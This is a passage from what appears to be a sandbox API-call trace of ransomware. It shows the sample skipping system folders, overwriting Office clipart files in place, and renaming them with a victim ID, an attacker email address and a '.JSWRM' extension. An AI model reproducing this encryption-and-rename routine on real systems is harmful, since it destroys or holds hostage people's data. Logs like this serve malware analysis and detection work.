hHeap=0x1e0000) returned 1 [0073.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.811] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN00010_.WMF", cAlternateFileName="")) returned 1 [0073.811] lstrcmpiW (lpString1="AN00010_.WMF", lpString2=".") returned 1 [0073.811] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="..") returned 1 [0073.811] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="...") returned 1 [0073.811] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="windows") returned -1 [0073.811] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="recovery") returned -1 [0073.811] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="perflogs") returned -1 [0073.811] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="documents and settings") returned -1 [0073.811] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0073.811] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="system volume information") returned -1 [0073.811] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="msocache") returned -1 [0073.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0073.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00010_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00010_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00010_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0073.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0073.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00010_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00010_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00010_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0073.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.812] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3026) returned 1 [0073.812] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbd0) returned 0x24c1d0 [0073.812] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xbd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xbd0, lpOverlapped=0x0) returned 1 [0073.814] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.814] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xbd0, lpOverlapped=0x0) returned 1 [0073.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.814] CloseHandle (hObject=0x460) returned 1 [0073.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0073.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0073.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0073.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0073.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0073.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.815] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0073.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.815] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN00015_.WMF", cAlternateFileName="")) returned 1 [0073.815] lstrcmpiW (lpString1="AN00015_.WMF", lpString2=".") returned 1 [0073.815] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="..") returned 1 [0073.815] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="...") returned 1 [0073.816] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="windows") returned -1 [0073.816] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="recovery") returned -1 [0073.816] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="perflogs") returned -1 [0073.816] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="documents and settings") returned -1 [0073.816] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0073.816] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="system volume information") returned -1 [0073.816] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="msocache") returned -1 [0073.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0073.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00015_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00015_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00015_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0073.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0073.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00015_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00015_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00015_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0073.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.816] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4734) returned 1 [0073.816] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1270) returned 0x24c1d0 [0073.816] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1270, lpOverlapped=0x0) returned 1 [0073.818] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.818] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1270, lpOverlapped=0x0) returned 1 [0073.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.818] CloseHandle (hObject=0x460) returned 1 [0073.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0073.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0073.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0073.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0073.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0073.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0073.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0073.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.819] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0073.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.819] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1634, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN00790_.WMF", cAlternateFileName="")) returned 1 [0073.820] lstrcmpiW (lpString1="AN00790_.WMF", lpString2=".") returned 1 [0073.820] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="..") returned 1 [0073.820] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="...") returned 1 [0073.820] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="windows") returned -1 [0073.820] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="recovery") returned -1 [0073.820] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="perflogs") returned -1 [0073.820] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="documents and settings") returned -1 [0073.820] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0073.820] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="system volume information") returned -1 [0073.820] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="msocache") returned -1 [0073.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0073.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00790_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00790_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00790_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0073.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0073.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00790_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00790_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN00790_.WMF", lpUsedDefaultChar=0x0) returned 12 [0073.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0073.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.821] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5684) returned 1 [0073.821] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1630) returned 0x24c1d0 [0073.821] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1630, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1630, lpOverlapped=0x0) returned 1 [0073.824] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.824] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1630, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1630, lpOverlapped=0x0) returned 1 [0073.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.824] CloseHandle (hObject=0x460) returned 1 [0073.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0073.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0073.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0073.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0073.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0073.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.825] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0073.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.825] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5062, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN00853_.WMF", cAlternateFileName="")) returned 1 [0073.826] lstrcmpiW (lpString1="AN00853_.WMF", lpString2=".") returned 1 [0073.826] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="..") returned 1 [0073.826] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="...") returned 1 [0073.826] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="windows") returned -1 [0073.826] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="recovery") returned -1 [0073.826] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="perflogs") returned -1 [0073.826] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="documents and settings") returned -1 [0073.826] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0073.826] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="system volume information") returned -1 [0073.826] lstrcmpiW (lpString1="AN00853_.WMF", lpString2="msocache") returned -1 [0073.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0073.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00853_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN00853_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 